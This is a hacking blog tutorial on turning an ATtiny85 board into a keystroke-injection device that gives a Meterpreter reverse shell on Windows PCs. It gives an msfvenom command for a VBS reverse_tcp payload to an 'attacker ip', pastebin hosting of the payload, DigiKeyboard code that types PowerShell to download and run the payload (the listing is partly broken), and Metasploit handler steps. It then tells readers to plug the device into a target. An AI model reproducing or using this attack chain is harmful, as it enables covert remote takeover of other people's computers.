meterpreter rubber ducky attiny85

How to get meterpreter shell with a Rubber ducky – attiny85

In the previous blog i have introduced what is a rubber ducky and how to use attiny85 as a rubber ducky. If you haven’t read that, you can check it out here. This is an arduino based chip with a low space available. We cant load a huge payload in to the flash memory. Here is a way to load the payload no matter how big it is. We have to make a payload using msfvenom and upload the code to pastebin. The ducky will load the script from the pastebin via the internet using powershell and execute it on the system. As soon as the script is executed, a meterpreter session will be pwned connect backs to the listener.

No more boring sessions, Just follow the steps.


Video Demo


step 1 : Create a payload

Use msfvenom to create a reverse_tcp payload. We should use VBS payload instead of EXE .

# msfvenom -p windows/meterpreter/reverse_tcp   -f vbs   –smallest  LHOST=“attacker ip”  LPORT=444 -o /root/Desktop/payload.txt


step 2: upload code to pastebin

Now open the file payload.txt from the desktop and copy the whole code. goto > click on “NEW PASTE” and paste the code, then click create paste. A new paste will be created. Note down the url somewhere, we need that in future.


step 3: Flashing Ducky

Attiny85 chip should be programmed to download raw code from pastebin and execute it. Use the script below. all you need to edit is the pastebin url  (line 20). Replace that “change_to_Your_url” . Make sure you are using “RAW” url. It should look something like this “” simply add “/raw/” in between.

after changing url compile and flash code using Arduino IDE to your chip. If you don,t know how to do that you must check my previous blog on 1$ rubber ducky preview .


#include "DigiKeyboard.h"

void setup() {

void loop() {
 int d=1000;
 // this is generally not necessary but with some older systems it seems to
 // prevent missing the first character after a delay:
 DigiKeyboard.print("$client = new-object System.Net.WebClient");
 DigiKeyboard.print("start Sys32Data.vbs");

step 4: setup handler

Setup reverse_tcp handler in msfconsole as we always do for metasploit based attacks.

# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


step 5: Plug on target

Simplest of all, just plug in the attiny85 to the target system. with this method you hack almost any windows pc over LAN and WAN. Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.

 Any doubts or questions? Ask it on our new hackers Q and A forum
Ask a Question

susmith HCK

susmith HCK Author

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.